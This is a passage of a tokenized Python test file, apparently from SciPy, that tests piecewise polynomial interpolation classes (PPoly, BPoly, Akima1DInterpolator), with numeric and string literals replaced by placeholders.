<NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> try : <EOL> ak . extend ( None , None ) <EOL> except NotImplementedError as e : <EOL> if str ( e ) != ( "<STR_LIT>" <EOL> "<STR_LIT>" ) : <EOL> raise <EOL> except : <EOL> raise <EOL> class TestPPolyCommon ( TestCase ) : <EOL> def test_sort_check ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:4> ] , [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ <NUM_LIT:3> , <NUM_LIT:6> ] ] ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.5> ] ) <EOL> assert_raises ( ValueError , PPoly , c , x ) <EOL> assert_raises ( ValueError , BPoly , c , x ) <EOL> def test_extend ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> order = <NUM_LIT:3> <EOL> x = np . unique ( np . r_ [ <NUM_LIT:0> , <NUM_LIT:10> * np . random . rand ( <NUM_LIT:30> ) , <NUM_LIT:10> ] ) <EOL> c = <NUM_LIT:2> * np . random . rand ( order + <NUM_LIT:1> , len ( x ) - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) - <NUM_LIT:1> <EOL> for cls in ( PPoly , BPoly ) : <EOL> pp = cls ( c [ : , : <NUM_LIT:9> ] , x [ : <NUM_LIT:10> ] ) <EOL> pp . extend ( c [ : , <NUM_LIT:9> : ] , x [ <NUM_LIT:10> : ] ) <EOL> pp2 = cls ( c [ : , <NUM_LIT:10> : ] , x [ <NUM_LIT:10> : ] ) <EOL> pp2 . extend ( c [ : , : <NUM_LIT:10> ] , x [ : <NUM_LIT:10> ] , right = False ) <EOL> pp3 = cls ( c , x ) <EOL> assert_array_equal ( pp . c , pp3 . c ) <EOL> assert_array_equal ( pp . x , pp3 . x ) <EOL> assert_array_equal ( pp2 . c , pp3 . c ) <EOL> assert_array_equal ( pp2 . x , pp3 . x ) <EOL> def test_extend_diff_orders ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> c = np . random . rand ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> x2 = np . linspace ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> ) <EOL> c2 = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> pp1 = cls ( c , x ) <EOL> pp2 = cls ( c2 , x2 ) <EOL> pp_comb = cls ( c , x ) <EOL> pp_comb . extend ( c2 , x2 [ <NUM_LIT:1> : ] ) <EOL> xi1 = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> , endpoint = False ) <EOL> xi2 = np . linspace ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> ) <EOL> assert_allclose ( pp1 ( xi1 ) , pp_comb ( xi1 ) ) <EOL> assert_allclose ( pp2 ( xi2 ) , pp_comb ( xi2 ) ) <EOL> def test_shape ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:8> , <NUM_LIT:12> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) <EOL> x = np . sort ( np . random . rand ( <NUM_LIT> ) ) <EOL> xp = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p = cls ( c , x ) <EOL> assert_equal ( p ( xp ) . shape , ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p = cls ( c [ ... , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , x ) <EOL> assert_equal ( np . shape ( p ( <NUM_LIT:0.5> ) ) , ( ) ) <EOL> assert_equal ( np . shape ( p ( np . array ( <NUM_LIT:0.5> ) ) ) , ( ) ) <EOL> assert_raises ( ValueError , p , np . array ( [ [ <NUM_LIT:0.1> , <NUM_LIT> ] , [ <NUM_LIT> ] ] ) ) <EOL> def test_complex_coef ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:8> , <NUM_LIT:12> ) ) * ( <NUM_LIT:1.> + <NUM_LIT> ) <EOL> c_re , c_im = c . real , c . imag <EOL> xp = np . random . random ( <NUM_LIT:5> ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p , p_re , p_im = cls ( c , x ) , cls ( c_re , x ) , cls ( c_im , x ) <EOL> for nu in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> assert_allclose ( p ( xp , nu ) . real , p_re ( xp , nu ) ) <EOL> assert_allclose ( p ( xp , nu ) . imag , p_im ( xp , nu ) ) <EOL> def test_axis ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) <EOL> c_s = c . shape <EOL> xp = np . random . random ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> for axis in ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) : <EOL> k , m = c . shape [ axis ] , c . shape [ axis + <NUM_LIT:1> ] <EOL> x = np . sort ( np . random . rand ( m + <NUM_LIT:1> ) ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p = cls ( c , x , axis = axis ) <EOL> assert_equal ( p . c . shape , <EOL> c_s [ axis : axis + <NUM_LIT:2> ] + c_s [ : axis ] + c_s [ axis + <NUM_LIT:2> : ] ) <EOL> res = p ( xp ) <EOL> targ_shape = c_s [ : axis ] + xp . shape + c_s [ <NUM_LIT:2> + axis : ] <EOL> assert_equal ( res . shape , targ_shape ) <EOL> for p1 in [ cls ( c , x , axis = axis ) . derivative ( ) , <EOL> cls ( c , x , axis = axis ) . derivative ( <NUM_LIT:2> ) , <EOL> cls ( c , x , axis = axis ) . antiderivative ( ) , <EOL> cls ( c , x , axis = axis ) . antiderivative ( <NUM_LIT:2> ) ] : <EOL> assert_equal ( p1 . axis , p . axis ) <EOL> for axis in ( - <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ) : <EOL> for cls in ( BPoly , PPoly ) : <EOL> assert_raises ( ValueError , cls , ** dict ( c = c , x = x , axis = axis ) ) <EOL> class TestPolySubclassing ( TestCase ) : <EOL> class P ( PPoly ) : <EOL> pass <EOL> class B ( BPoly ) : <EOL> pass <EOL> def _make_polynomials ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:3> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:2> ) ) <EOL> return self . P ( c , x ) , self . B ( c , x ) <EOL> def test_derivative ( self ) : <EOL> pp , bp = self . _make_polynomials ( ) <EOL> for p in ( pp , bp ) : <EOL> pd = p . derivative ( ) <EOL> assert_equal ( p . __class__ , pd . __class__ ) <EOL> ppa = pp . antiderivative ( ) <EOL> assert_equal ( pp . __class__ , ppa . __class__ ) <EOL> def test_from_spline ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> ) <EOL> pp = self . P . from_spline ( spl ) <EOL> assert_equal ( pp . __class__ , self . P ) <EOL> def test_conversions ( self ) : <EOL> pp , bp = self . _make_polynomials ( ) <EOL> pp1 = self . P . from_bernstein_basis ( bp ) <EOL> assert_equal ( pp1 . __class__ , self . P ) <EOL> bp1 = self . B . from_power_basis ( pp ) <EOL> assert_equal ( bp1 . __class__ , self . B ) <EOL> def test_from_derivatives ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> y = [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] <EOL> bp = self . B . from_derivatives ( x , y ) <EOL> assert_equal ( bp . __class__ , self . B ) <EOL> class TestPPoly ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:4> ] , [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ <NUM_LIT:3> , <NUM_LIT:6> ] ] ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:1> * <NUM_LIT> ** <NUM_LIT:2> + <NUM_LIT:2> * <NUM_LIT> + <NUM_LIT:3> ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:4> * ( <NUM_LIT> - <NUM_LIT:0.5> ) ** <NUM_LIT:2> + <NUM_LIT:5> * ( <NUM_LIT> - <NUM_LIT:0.5> ) + <NUM_LIT:6> ) <EOL> def test_multi_shape ( self ) : <EOL> c = np . random . rand ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> assert_equal ( p . x . shape , x . shape ) <EOL> assert_equal ( p . c . shape , c . shape ) <EOL> assert_equal ( p ( <NUM_LIT> ) . shape , c . shape [ <NUM_LIT:2> : ] ) <EOL> assert_equal ( p ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:6> ) ) . shape , <EOL> ( <NUM_LIT:5> , <NUM_LIT:6> ) + c . shape [ <NUM_LIT:2> : ] ) <EOL> dp = p . derivative ( ) <EOL> assert_equal ( dp . c . shape , ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> ip = p . antiderivative ( ) <EOL> assert_equal ( ip . c . shape , ( <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> def test_construct_fast ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:4> ] , [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ <NUM_LIT:3> , <NUM_LIT:6> ] ] , dtype = float ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly . construct_fast ( c , x ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:1> * <NUM_LIT> ** <NUM_LIT:2> + <NUM_LIT:2> * <NUM_LIT> + <NUM_LIT:3> ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:4> * ( <NUM_LIT> - <NUM_LIT:0.5> ) ** <NUM_LIT:2> + <NUM_LIT:5> * ( <NUM_LIT> - <NUM_LIT:0.5> ) + <NUM_LIT:6> ) <EOL> def test_vs_alternative_implementations ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:12> , <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> xp = np . r_ [ <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] <EOL> expected = _ppoly_eval_1 ( c , x , xp ) <EOL> assert_allclose ( p ( xp ) , expected ) <EOL> expected = _ppoly_eval_2 ( c [ : , : , <NUM_LIT:0> ] , x , xp ) <EOL> assert_allclose ( p ( xp ) [ : , <NUM_LIT:0> ] , expected ) <EOL> def test_from_spline ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> assert_allclose ( pp ( xi ) , splev ( xi , spl ) ) <EOL> def test_derivative_simple ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . array ( [ [ <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] ] ) . T <EOL> dc = np . array ( [ [ <NUM_LIT:3> * <NUM_LIT:4> , <NUM_LIT:2> * <NUM_LIT:3> , <NUM_LIT:2> ] ] ) . T <EOL> ddc = np . array ( [ [ <NUM_LIT:2> * <NUM_LIT:3> * <NUM_LIT:4> , <NUM_LIT:1> * <NUM_LIT:2> * <NUM_LIT:3> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> dpp = PPoly ( dc , x ) <EOL> ddpp = PPoly ( ddc , x ) <EOL> assert_allclose ( pp . derivative ( ) . c , dpp . c ) <EOL> assert_allclose ( pp . derivative ( <NUM_LIT:2> ) . c , ddpp . c ) <EOL> def test_derivative_eval ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> assert_allclose ( pp ( xi , dx ) , splev ( xi , spl , dx ) ) <EOL> def test_derivative ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> assert_allclose ( pp ( xi , dx ) , pp . derivative ( dx ) ( xi ) , <EOL> err_msg = "<STR_LIT>" % ( dx , ) ) <EOL> def test_antiderivative_of_constant ( self ) : <EOL> p = PPoly ( [ [ <NUM_LIT:1.> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> assert_equal ( p . antiderivative ( ) . c , PPoly ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) . c ) <EOL> assert_equal ( p . antiderivative ( ) . x , PPoly ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) . x ) <EOL> def test_antiderivative_regression_4355 ( self ) : <EOL> p = PPoly ( [ [ <NUM_LIT:1.> , <NUM_LIT:0.5> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> q = p . antiderivative ( ) <EOL> assert_equal ( q . c , [ [ <NUM_LIT:1> , <NUM_LIT:0.5> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> assert_equal ( q . x , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> assert_allclose ( p . integrate ( <NUM_LIT:0> , <NUM_LIT:2> ) , <NUM_LIT> ) <EOL> assert_allclose ( q ( <NUM_LIT:2> ) - q ( <NUM_LIT:0> ) , <NUM_LIT> ) <EOL> def test_antiderivative_simple ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . array ( [ [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] ] ) . T <EOL> ic = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ] ] ) . T <EOL> iic = np . array ( [ [ <NUM_LIT:1> / <NUM_LIT:4> , <NUM_LIT:1> / <NUM_LIT:3> , <NUM_LIT:1> / <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> / <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> ipp = pp . antiderivative ( ) <EOL> iipp = pp . antiderivative ( <NUM_LIT:2> ) <EOL> iipp2 = ipp . antiderivative ( ) <EOL> assert_allclose ( ipp . x , x ) <EOL> assert_allclose ( ipp . c . T , ic . T ) <EOL> assert_allclose ( iipp . c . T , iic . T ) <EOL> assert_allclose ( iipp2 . c . T , iic . T ) <EOL> def test_antiderivative_vs_derivative ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:30> ) ** <NUM_LIT:2> <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> ipp = pp . antiderivative ( dx ) <EOL> pp2 = ipp . derivative ( dx ) <EOL> assert_allclose ( pp . c , pp2 . c ) <EOL> for k in range ( dx ) : <EOL> pp2 = ipp . derivative ( k ) <EOL> r = <NUM_LIT> <EOL> endpoint = r * pp2 . x [ : - <NUM_LIT:1> ] + ( <NUM_LIT:1> - r ) * pp2 . x [ <NUM_LIT:1> : ] <EOL> assert_allclose ( pp2 ( pp2 . x [ <NUM_LIT:1> : ] ) , pp2 ( endpoint ) , <EOL> rtol = <NUM_LIT> , err_msg = "<STR_LIT>" % ( dx , k ) ) <EOL> def test_antiderivative_vs_spline ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> pp2 = pp . antiderivative ( dx ) <EOL> spl2 = splantider ( spl , dx ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> assert_allclose ( pp2 ( xi ) , splev ( xi , spl2 ) , <EOL> rtol = <NUM_LIT> ) <EOL> def test_antiderivative_continuity ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] , [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> ip = p . antiderivative ( ) <EOL> assert_allclose ( ip ( <NUM_LIT:0.5> - <NUM_LIT> ) , ip ( <NUM_LIT:0.5> + <NUM_LIT> ) , rtol = <NUM_LIT> ) <EOL> p2 = ip . derivative ( ) <EOL> assert_allclose ( p2 . c , p . c ) <EOL> def test_integrate ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> a , b = <NUM_LIT> , <NUM_LIT> <EOL> ig = pp . integrate ( a , b ) <EOL> ipp = pp . antiderivative ( ) <EOL> assert_allclose ( ig , ipp ( b ) - ipp ( a ) ) <EOL> assert_allclose ( ig , splint ( a , b , spl ) ) <EOL> a , b = - <NUM_LIT> , <NUM_LIT> <EOL> ig = pp . integrate ( a , b , extrapolate = True ) <EOL> assert_allclose ( ig , ipp ( b ) - ipp ( a ) ) <EOL> assert_ ( np . isnan ( pp . integrate ( a , b , extrapolate = False ) ) . all ( ) ) <EOL> def test_roots ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> ) ** <NUM_LIT:2> <EOL> y = np . sin ( <NUM_LIT:30> * x ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:3> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> r = pp . roots ( ) <EOL> r = r [ ( r >= <NUM_LIT:0> - <NUM_LIT> ) & ( r <= <NUM_LIT:1> + <NUM_LIT> ) ] <EOL> assert_allclose ( r , sproot ( spl ) , atol = <NUM_LIT> ) <EOL> def test_roots_idzero ( self ) : <EOL> c = np . array ( [ [ - <NUM_LIT:1> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ - <NUM_LIT:1> , <NUM_LIT> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> ] ) <EOL> pp = PPoly ( c , x ) <EOL> assert_array_equal ( pp . roots ( ) , <EOL> [ <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> + <NUM_LIT> ] ) <EOL> const = <NUM_LIT> <EOL> c1 = c . copy ( ) <EOL> c1 [ <NUM_LIT:1> , : ] += const <EOL> pp1 = PPoly ( c1 , x ) <EOL> assert_array_equal ( pp1 . solve ( const ) , <EOL> [ <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> + <NUM_LIT> ] ) <EOL> def test_roots_all_zero ( self ) : <EOL> c = [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> p = PPoly ( c , x ) <EOL> assert_array_equal ( p . roots ( ) , [ <NUM_LIT:0> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:0> ) , [ <NUM_LIT:0> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:1> ) , [ ] ) <EOL> c = [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> p = PPoly ( c , x ) <EOL> assert_array_equal ( p . roots ( ) , [ <NUM_LIT:0> , np . nan , <NUM_LIT:1> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:0> ) , [ <NUM_LIT:0> , np . nan , <NUM_LIT:1> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:1> ) , [ ] ) <EOL> def test_roots_repeated ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) . T <EOL> x = np . array ( [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> assert_array_equal ( pp . roots ( ) , [ - <NUM_LIT:2> , <NUM_LIT:0> ] ) <EOL> assert_array_equal ( pp . roots ( extrapolate = False ) , [ <NUM_LIT:0> ] ) <EOL> def test_roots_discont ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:1> ] , [ - <NUM_LIT:1> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> assert_array_equal ( pp . roots ( ) , [ <NUM_LIT:0.5> ] ) <EOL> assert_array_equal ( pp . roots ( discontinuity = False ) , [ ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT:0.5> ) , [ <NUM_LIT:0.5> ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT:0.5> , discontinuity = False ) , [ ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT> ) , [ ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT> , discontinuity = False ) , [ ] ) <EOL> def test_roots_random ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> num = <NUM_LIT:0> <EOL> for extrapolate in ( True , False ) : <EOL> for order in range ( <NUM_LIT:0> , <NUM_LIT:20> ) : <EOL> x = np . unique ( np . r_ [ <NUM_LIT:0> , <NUM_LIT:10> * np . random . rand ( <NUM_LIT:30> ) , <NUM_LIT:10> ] ) <EOL> c = <NUM_LIT:2> * np . random . rand ( order + <NUM_LIT:1> , len ( x ) - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) - <NUM_LIT:1> <EOL> pp = PPoly ( c , x ) <EOL> for y in [ <NUM_LIT:0> , np . random . random ( ) ] : <EOL> r = pp . solve ( y , discontinuity = False , extrapolate = extrapolate ) <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> for j in range ( <NUM_LIT:3> ) : <EOL> rr = r [ i , j ] <EOL> if rr . size > <NUM_LIT:0> : <EOL> num += rr . size <EOL> val = pp ( rr , extrapolate = extrapolate ) [ : , i , j ] <EOL> cmpval = pp ( rr , nu = <NUM_LIT:1> , <EOL> extrapolate = extrapolate ) [ : , i , j ] <EOL> msg = "<STR_LIT>" % ( extrapolate , repr ( rr ) , ) <EOL> assert_allclose ( ( val - y ) / cmpval , <NUM_LIT:0> , atol = <NUM_LIT> , <EOL> err_msg = msg ) <EOL> assert_ ( num > <NUM_LIT:100> , repr ( num ) ) <EOL> def test_roots_croots ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> for k in range ( <NUM_LIT:1> , <NUM_LIT:15> ) : <EOL> c = np . random . rand ( k , <NUM_LIT:1> , <NUM_LIT> ) <EOL> if k == <NUM_LIT:3> : <EOL> c [ : , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> <EOL> for y in [ <NUM_LIT:0> , np . random . random ( ) ] : <EOL> w = np . empty ( c . shape , dtype = complex ) <EOL> _ppoly . _croots_poly1 ( c , w ) <EOL> if k == <NUM_LIT:1> : <EOL> assert_ ( np . isnan ( w ) . all ( ) ) <EOL> continue <EOL> res = <NUM_LIT:0> <EOL> cres = <NUM_LIT:0> <EOL> for i in range ( k ) : <EOL> res += c [ i , None ] * w ** ( k - <NUM_LIT:1> - i ) <EOL> cres += abs ( c [ i , None ] * w ** ( k - <NUM_LIT:1> - i ) ) <EOL> with np . errstate ( invalid = '<STR_LIT:ignore>' ) : <EOL> res /= cres <EOL> res = res . ravel ( ) <EOL> res = res [ ~ np . isnan ( res ) ] <EOL> assert_allclose ( res , <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> def test_extrapolate_attr ( self ) : <EOL> c = np . array ( [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> for extrapolate in [ True , False , None ] : <EOL> pp = PPoly ( c , x , extrapolate = extrapolate ) <EOL> pp_d = pp . derivative ( ) <EOL> pp_i = pp . antiderivative ( ) <EOL> if extrapolate is False : <EOL> assert_ ( np . isnan ( pp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_ ( np . isnan ( pp_i ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_ ( np . isnan ( pp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_equal ( pp . roots ( ) , [ <NUM_LIT:1> ] ) <EOL> else : <EOL> assert_allclose ( pp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) , [ <NUM_LIT:1> - <NUM_LIT:0.1> ** <NUM_LIT:2> , <NUM_LIT:1> - <NUM_LIT> ** <NUM_LIT:2> ] ) <EOL> assert_ ( not np . isnan ( pp_i ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> assert_ ( not np . isnan ( pp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> assert_allclose ( pp . roots ( ) , [ <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> class TestBPoly ( TestCase ) : <EOL> def test_simple ( self ) : 